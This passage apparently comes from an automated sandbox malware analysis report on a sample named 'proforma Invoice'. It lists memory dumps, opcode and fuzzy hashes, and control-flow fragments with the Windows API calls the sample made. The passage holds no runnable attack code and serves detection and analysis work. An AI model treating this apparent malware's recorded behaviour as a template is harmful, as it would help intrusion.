                                                                          • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                          • Instruction Fuzzy Hash: F111DF76444280CFCF02CF54D5C4B16BFB1FB88314F24C6A9D9490B256C336D45ADBA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051565278.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10ad000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                          • Instruction ID: 4b6e0ff82f3c803fbded00f159c8c73bae3ecce4f739931029f3b46b235afe92
                                                                          • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                          • Instruction Fuzzy Hash: FA11BB75504280DFDB02CF94C5C4B15BFA1FB84224F24C6A9D8894B6A6C33AD40ACB62
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066252033.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7340000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca28d7ec24e27016bdbaa2692adbcbae2e84fc2cb786b288a12f054f01f548b8
                                                                          • Instruction ID: 4245815db58b5803cd8f9d26157732204d2f834567f877105af2db16bde66f6d
                                                                          • Opcode Fuzzy Hash: ca28d7ec24e27016bdbaa2692adbcbae2e84fc2cb786b288a12f054f01f548b8
                                                                          • Instruction Fuzzy Hash: 1A1145B19093C9DFD706DB74C811A89BFB19F03220F18C5EAC0A8CB6A3C739854ACB11
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066252033.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7340000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b22df61bf73b457b98c7b7fca0f1ea3e807f709f7df7686be0ca4cdb61dc91e6
                                                                          • Instruction ID: 4e63ce3ab885c11573c17aae3f7af31c22ee6b7b2621307c85cd35e74de9dc8b
                                                                          • Opcode Fuzzy Hash: b22df61bf73b457b98c7b7fca0f1ea3e807f709f7df7686be0ca4cdb61dc91e6
                                                                          • Instruction Fuzzy Hash: C3F05EF1E046169FE754DF6AC94A76BBAF4EF09210F2484A9954AE2701E77096048BA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066252033.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7340000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 42aeaf873dfa4f8757ccb735715d875fb52653b0a2b63d7ab251620d55cde2ea
                                                                          • Instruction ID: ca27ccbb3c29343a5b98ee288617184ab62aa107fc5b47c7e0fb152f9a0a76cf
                                                                          • Opcode Fuzzy Hash: 42aeaf873dfa4f8757ccb735715d875fb52653b0a2b63d7ab251620d55cde2ea
                                                                          • Instruction Fuzzy Hash: D5E030F0E0421A9FE754DF6E884576BBBF4EF48200F1048A9D549E6200E77096008BE1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: yg-
                                                                          • API String ID: 0-1745838684
                                                                          • Opcode ID: d215fd01e2ccc52ec2515285b6d4b312b2a711a79454113ce027ec50495df31c
                                                                          • Instruction ID: c06c5d39a5faf6eba02b8c47afa5454e82e24994ce6c1f8cf5bb575b9d818fd0
                                                                          • Opcode Fuzzy Hash: d215fd01e2ccc52ec2515285b6d4b312b2a711a79454113ce027ec50495df31c
                                                                          • Instruction Fuzzy Hash: 98E11AB4E101198FCB14DFA9C580AAEFBF2FF89305F648169D409AB356D731A941CFA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 171e618293db5b707136eaa90c1ca44ddb0b871fc3dce9253665ed93e3fb3d4d
                                                                          • Instruction ID: 55c07acc6477f9289c40f76ddaad5d11fb6bb9e2eea298c29e0d6d181afd6dae
                                                                          • Opcode Fuzzy Hash: 171e618293db5b707136eaa90c1ca44ddb0b871fc3dce9253665ed93e3fb3d4d
                                                                          • Instruction Fuzzy Hash: 9FE10BB4E001598FCB14DFA9D580AAEFBF2FF89305F24816AD415AB359D731A941CFA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dc9c45a412367dbfc232b08c55485b4279cf0025ff9db17be7d47aad6cb5267f
                                                                          • Instruction ID: a10b38d509c320dea972cf2dbdf277d68a7126767f0923695a7c4ebc00eae76a
                                                                          • Opcode Fuzzy Hash: dc9c45a412367dbfc232b08c55485b4279cf0025ff9db17be7d47aad6cb5267f
                                                                          • Instruction Fuzzy Hash: 55E1E7B4E011199FCB14DFA9C5809AEFBF2FF89305F248169D854AB35AD731A941CFA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 22cd942a45365bb4c118012f67cdd58a14766c83d21ccbff21c225e10d5c5948
                                                                          • Instruction ID: 6e3de29aa33e5b8c75b465ecdb799dcc5542a1ea982a0994d10adb8cf08bd6d1
                                                                          • Opcode Fuzzy Hash: 22cd942a45365bb4c118012f67cdd58a14766c83d21ccbff21c225e10d5c5948
                                                                          • Instruction Fuzzy Hash: 50E108B5E001298FCB14DFA9C580AAEFBF2BF89305F24C169D415AB356D731A941CFA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 935fe39b0172385631e4a83ccb3aed2dcf5c6933968ca68f0fe114091e809772
                                                                          • Instruction ID: 7a6e222f54721cab3103c3fed586b86c9ea12b77ed3b2c1f718d4b7f70c57cd0
                                                                          • Opcode Fuzzy Hash: 935fe39b0172385631e4a83ccb3aed2dcf5c6933968ca68f0fe114091e809772
                                                                          • Instruction Fuzzy Hash: 9FE12AB4E011198FCB14DFA9C5909AEFBF2FF89305F248169E415AB35AD731A941CFA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d283ac0c1fc8621ea0ed72c0c9b244f75c02230b62db4bc584b8e0af9b93ff9d
                                                                          • Instruction ID: 38aee19e7287a7ae9d0c7b7ad9589a83913c7c60887a1a46d819d5d53ea9653b
                                                                          • Opcode Fuzzy Hash: d283ac0c1fc8621ea0ed72c0c9b244f75c02230b62db4bc584b8e0af9b93ff9d
                                                                          • Instruction Fuzzy Hash: BEE12DB4E001198FCB14DFA9C5909AEFBF2FF89305F248169D415AB355D731A941CFA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e70efa18f9e78ad72c929f87b388d376b1e438d3fa618ec0af6844c9961d845
                                                                          • Instruction ID: 3ff631b4f83ebab7946697915e51c4a932019c45f147fcf7c668202263a87379
                                                                          • Opcode Fuzzy Hash: 4e70efa18f9e78ad72c929f87b388d376b1e438d3fa618ec0af6844c9961d845
                                                                          • Instruction Fuzzy Hash: 96A17F36E002168FCF05DFB5C8405DEBBB2FF99304B15856AE915AB265DB31E91ACB80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ce5458fbbc8ac89b27b72883df6dcbd188d70110779e00077b0b545d75e43a02
                                                                          • Instruction ID: ede13c13b97c94e329ad738a7790a16a166e21ee38dd08c596c4932ec620b92b
                                                                          • Opcode Fuzzy Hash: ce5458fbbc8ac89b27b72883df6dcbd188d70110779e00077b0b545d75e43a02
                                                                          • Instruction Fuzzy Hash: F47172B4E016198FDB04DFAAC9849DEFBF2BF89310F14D16AD419AB215DB349942CF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e4d10d1054b55e2b78c5bb0ab7c213891378939b4b1c2b0a7dce66b82b6548ee
                                                                          • Instruction ID: db7cda1017b266b1d5b34a4be3d597e91f3c964fff67fcbf58054fec82f5626c
                                                                          • Opcode Fuzzy Hash: e4d10d1054b55e2b78c5bb0ab7c213891378939b4b1c2b0a7dce66b82b6548ee
                                                                          • Instruction Fuzzy Hash: B45184B5E006198FDB08CFAAC94469EFBF2BF89310F14C16AD819AB354DB349946CF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1ceb994de3d9011e8e66172a61e3674524799609ecbb0587fb24a061947a2db6
                                                                          • Instruction ID: 9a4941dfcf0def9f5b0149aa3728e3ac5f99de7e224b72e18c15b82c1cd22432
                                                                          • Opcode Fuzzy Hash: 1ceb994de3d9011e8e66172a61e3674524799609ecbb0587fb24a061947a2db6
                                                                          • Instruction Fuzzy Hash: 8FF0F67595A118CACF24DF64E8447F8FBB8FB4B312F0024A6D84992251DB309984CF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d708e6107039b77faa94329c954bd1789da75fb1280f9856ac2b5bec4892e65c
                                                                          • Instruction ID: ef544a1ca044faeb80ac3228dc869659ff4d3cca563451556db383125cdf0e90
                                                                          • Opcode Fuzzy Hash: d708e6107039b77faa94329c954bd1789da75fb1280f9856ac2b5bec4892e65c
                                                                          • Instruction Fuzzy Hash: D5F01CB5A5B114DFCB50DB54E4045F8FBB8FB4B611F0130B6E84E97112DB3095448F54

                                                                          Execution Graph

                                                                          Execution Coverage:1.6%
                                                                          Dynamic/Decrypted Code Coverage:4.9%
                                                                          Signature Coverage:7.6%
                                                                          Total number of Nodes:144
                                                                          Total number of Limit Nodes:10

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 222 4177f3-41781c call 42f373 225 417822-417830 call 42f973 222->225 226 41781e-417821 222->226 229 417840-417851 call 42ddb3 225->229 230 417832-41783d call 42fc13 225->230 235 417853-417867 LdrLoadDll 229->235 236 41786a-41786d 229->236 230->229 235->236
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417865
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 2c219f7c767eb9b28ee7cd55e6e12fca76fdadb7cb09fab620ab4446465a0343
                                                                          • Instruction ID: 2ce8ff68d09b45714d63913b0514ef13c1845fd593f41c3a2cd435c83123a1a3
                                                                          • Opcode Fuzzy Hash: 2c219f7c767eb9b28ee7cd55e6e12fca76fdadb7cb09fab620ab4446465a0343
                                                                          • Instruction Fuzzy Hash: 590152B1E4020DB7DF10EAA1DC42FDEB3789B14308F4041A6ED0897240F634EB58C795

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 247 42c653-42c68c call 404a93 call 42d8b3 NtClose
                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C687
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 238c78508bed0e6f854b915faa3d91bc94ed0096435d2cdf997d36a67c8fcb6c
                                                                          • Instruction ID: f79262d72201e0e60c0a3d96aaf994aae0b1b28e6a59d1ed98bd2ddbb89cd5e2
                                                                          • Opcode Fuzzy Hash: 238c78508bed0e6f854b915faa3d91bc94ed0096435d2cdf997d36a67c8fcb6c
                                                                          • Instruction Fuzzy Hash: EDE04F757402147BD610EA9ADC01F9BB76CDFC5714F004019FA18A7281C671B9118BF5
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 23b1a9a4bb8826e1e5689b1772c966257da98445c8cfade0a294026b477d51b4
                                                                          • Instruction ID: 0edf157ae0feb3508091aa36c857cc3258d86e7070d082290c6571d1c58bf081
                                                                          • Opcode Fuzzy Hash: 23b1a9a4bb8826e1e5689b1772c966257da98445c8cfade0a294026b477d51b4
                                                                          • Instruction Fuzzy Hash: 0E90023160550402D10471684A54746100997D0601F65C411E0426568DC7958A516AA2

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 261 11a2b60-11a2b6c LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 7928f55a116bfd9384bd2bcc107cdd1a9c39bd2986e3360327195a647ebf061d
                                                                          • Instruction ID: 5a0465e37bd9acce708244322f777a07854ad6122fe68f7af3ae650234435b0a
                                                                          • Opcode Fuzzy Hash: 7928f55a116bfd9384bd2bcc107cdd1a9c39bd2986e3360327195a647ebf061d
                                                                          • Instruction Fuzzy Hash: E890026120240003410971684954656400E97E0601B55C021E1016590DC62589916625

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 263 11a2df0-11a2dfc LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0d886eaa839fd664edb02cb702c561c49dbeadd71948755573a6309df6c50454
                                                                          • Instruction ID: b4c8c644fb4d459d3860b157ddb2bec7ff8570f7c25af57f95368c40d61088a1
                                                                          • Opcode Fuzzy Hash: 0d886eaa839fd664edb02cb702c561c49dbeadd71948755573a6309df6c50454
                                                                          • Instruction Fuzzy Hash: 0A90023120140413D11571684A44747000D97D0641F95C412E0426558DD7568A52A621

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 262 11a2c70-11a2c7c LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a98a69c64dac4c0616014016c74de37fd20a6c91e95b1fc12e0f9ece4160e683
                                                                          • Instruction ID: 51898f732e965affa0dcd29942b301877e49e9850fadbe0f2acb07917bc89878
                                                                          • Opcode Fuzzy Hash: a98a69c64dac4c0616014016c74de37fd20a6c91e95b1fc12e0f9ece4160e683
                                                                          • Instruction Fuzzy Hash: 5F90023120148802D1147168894478A000997D0701F59C411E4426658DC79589917621

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 413fa2-413fac 1 413fd1-413fd2 0->1 2 413fae 0->2 3 413fd4-413fdc 1->3 4 414037-414056 1->4 2->1 6 413fdd-413feb 3->6 7 413f86-413f8a 3->7 5 414058-414064 4->5 4->6 9 414065-414081 5->9 10 414017-414018 6->10 11 413fed 6->11 8 413f8b-413f8d 7->8 13 413f53-413f5d 8->13 14 413f8f-413f92 8->14 15 41401b-414022 10->15 11->15 16 413fef-413ffe 11->16 13->7 14->0 17 414090-4140ed call 42e833 call 42f243 call 4177f3 call 404a03 call 424ec3 15->17 18 414024-414026 15->18 16->2 19 414000-414001 16->19 32 41410d-414113 17->32 33 4140ef-4140fe PostThreadMessageW 17->33 18->9 20 414028-414036 18->20 19->8 22 414003 19->22 20->4 33->32 34 414100-41410a 33->34 34->32
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Dgn$s002-5p$s002-5p
                                                                          • API String ID: 0-326510446
                                                                          • Opcode ID: 5610e1d9abbf3b5feeb2ba498749f12c53c180cb3e8539c8ad38d8c4714e54f5
                                                                          • Instruction ID: af3e7b8de85645b6cd955b89a5411ea0b75fcf488d0501c8713690a19e74f5f2
                                                                          • Opcode Fuzzy Hash: 5610e1d9abbf3b5feeb2ba498749f12c53c180cb3e8539c8ad38d8c4714e54f5
                                                                          • Instruction Fuzzy Hash: FA31FF72D041187FEF10DEA9D8419FE7FA8DFD5764F00446AE510A7301D6298A87C799

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 35 414114-414116 36 4140b7-4140c0 35->36 37 414118-41411f 35->37 40 4140c7-4140ed call 424ec3 36->40 41 4140c2 call 404a03 36->41 38 414121-414129 37->38 39 414142-414146 37->39 42 41412b-41412f 38->42 43 414159-41415c 39->43 44 414148-41414b 39->44 49 41410d-414113 40->49 50 4140ef-4140fe PostThreadMessageW 40->50 41->40 47 414131-414136 42->47 48 41414d-414153 42->48 44->43 44->48 47->48 51 414138-41413d 47->51 48->42 52 414155-414158 48->52 50->49 53 414100-41410a 50->53 51->48 54 41413f 51->54 53->49 54->39
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(s002-5p,00000111,00000000,00000000), ref: 004140FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: s002-5p$s002-5p
                                                                          • API String ID: 1836367815-979023209
                                                                          • Opcode ID: 2004a2f5e5a8bb523dd4c5c978743418ac97622185ca0d061fdb48c6dbf17371
                                                                          • Instruction ID: 100e8e29478d8f210fc824b2ce33949e2aa08dff37cc6dd6d2884f7ee3d1bbb0
                                                                          • Opcode Fuzzy Hash: 2004a2f5e5a8bb523dd4c5c978743418ac97622185ca0d061fdb48c6dbf17371
                                                                          • Instruction Fuzzy Hash: 24115E71C001487DDF205E748C84DFB7B6D9EA23A8B48429FE510DB3A2C2398DC6CB59

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(s002-5p,00000111,00000000,00000000), ref: 004140FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: s002-5p$s002-5p
                                                                          • API String ID: 1836367815-979023209
                                                                          • Opcode ID: 1cf14d4b6567c94e39c004e87c1ad0b090585aa86234257e236a47f0aaa3e222
                                                                          • Instruction ID: 79950ae8218b7a60c02b67b575f51a5d31630f0c15ae353de40f050eb0526b10
                                                                          • Opcode Fuzzy Hash: 1cf14d4b6567c94e39c004e87c1ad0b090585aa86234257e236a47f0aaa3e222
                                                                          • Instruction Fuzzy Hash: 1701D6B1D0121C7EEB10AAE19C81DEFBB7CDF81398F408069FA14A7240D6785E068BF5

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 213 417892-41789a 214 417857-417867 LdrLoadDll 213->214 215 41789b-4178b2 213->215 216 41786a-41786d 214->216 215->215 217 4178b4 215->217 218 4178b7 217->218 219 4178cd-4178d2 217->219 220 417901-417907 219->220 221 4178d4-4178f1 219->221 221->220
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417865
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: a2ede0a05b9cc6e92daf99c51b20419e574181b552d31cd8fd50e09fdf8ae0b7
                                                                          • Instruction ID: 88c257fe231ed8b8c9cac90da85555ff8419b4f5cefb42a4719f8c0a04e025e1
                                                                          • Opcode Fuzzy Hash: a2ede0a05b9cc6e92daf99c51b20419e574181b552d31cd8fd50e09fdf8ae0b7
                                                                          • Instruction Fuzzy Hash: DF01763564D309EFD755DB84C882BD0BB34FB41710FA001CAD940AB743C6626980CBE1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 242 42c9d3-42ca14 call 404a93 call 42d8b3 RtlFreeHeap
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C78BFC45,00000007,00000000,00000004,00000000,004170D1,000000F4), ref: 0042CA0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 976261c2090beaf7761a7e578b6574be5373c1aea863a2aff8f02f2be9c57ce1
                                                                          • Instruction ID: 5deae782a6f90318f90cdaf530a4784fcf3403325b7a1d1ba995d9823e504f66
                                                                          • Opcode Fuzzy Hash: 976261c2090beaf7761a7e578b6574be5373c1aea863a2aff8f02f2be9c57ce1
                                                                          • Instruction Fuzzy Hash: 40E06D716003047BD610EE99EC41FAB77ADEFC8714F004019F918A7241C671B9108BB8

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 237 42c983-42c9c7 call 404a93 call 42d8b3 RtlAllocateHeap
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00424A7F,?,?,00424A7F,00000000,?,?,00424A7F,?,00000104), ref: 0042C9C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: ae3a77b44a70c96677e662bd54acaead76c1205bde67aa46dfc959a20e6bb57e
                                                                          • Instruction ID: 9d6c3d2b06f1d0e43ad6ec7aa0dddcfad8651c14c3ccdf4e36b6d1596e56025d
                                                                          • Opcode Fuzzy Hash: ae3a77b44a70c96677e662bd54acaead76c1205bde67aa46dfc959a20e6bb57e
                                                                          • Instruction Fuzzy Hash: BAE06DB16003047BD614EE99EC41F9B77ACEFC9710F00401AF918A7241D670BE108BB8

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 252 42ca23-42ca5c call 404a93 call 42d8b3 ExitProcess
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,3AC1D885,?,?,3AC1D885), ref: 0042CA57
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: 70e1010529ec0fb5d52cddbeb0b181d07d26c66f585e4acd9267fd2fb8c23613
                                                                          • Instruction ID: 7135c82dfa76e2c124559f17e6f5fc415edf9d4f41954f1f8579cc00978a4f8c
                                                                          • Opcode Fuzzy Hash: 70e1010529ec0fb5d52cddbeb0b181d07d26c66f585e4acd9267fd2fb8c23613
                                                                          • Instruction Fuzzy Hash: 4FE046766402147BD620FA9ADC02F9BB76CDFC5724F10452AFA18A7285C671BA108BF4

                                                                          Control-flow Graph

                                                                          • Executed
